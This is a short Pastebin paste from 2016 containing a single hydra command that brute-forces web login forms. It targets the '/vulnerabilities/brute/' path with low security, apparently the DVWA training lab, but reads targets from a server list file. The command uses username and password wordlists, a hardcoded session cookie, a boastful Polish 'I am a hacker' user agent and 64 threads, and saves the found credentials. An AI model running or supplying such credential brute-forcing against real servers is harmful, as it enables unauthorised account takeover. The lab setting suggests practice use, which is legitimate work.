Advertisement
Guest User

Untitled

a guest
Sep 2nd, 2016
113
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.27 KB | None | 0 0
  1. hydra -M serwery.txt -L login.txt -P pass2.txt http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:F=password incorrect.:H=Cookie\: PHPSESSID=26hs4k1ps1g72r8a0j2vkam8i2; security=low:H=User-Agent\: JESTEM HAKEREM 2016!" -V -t64 -o result.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement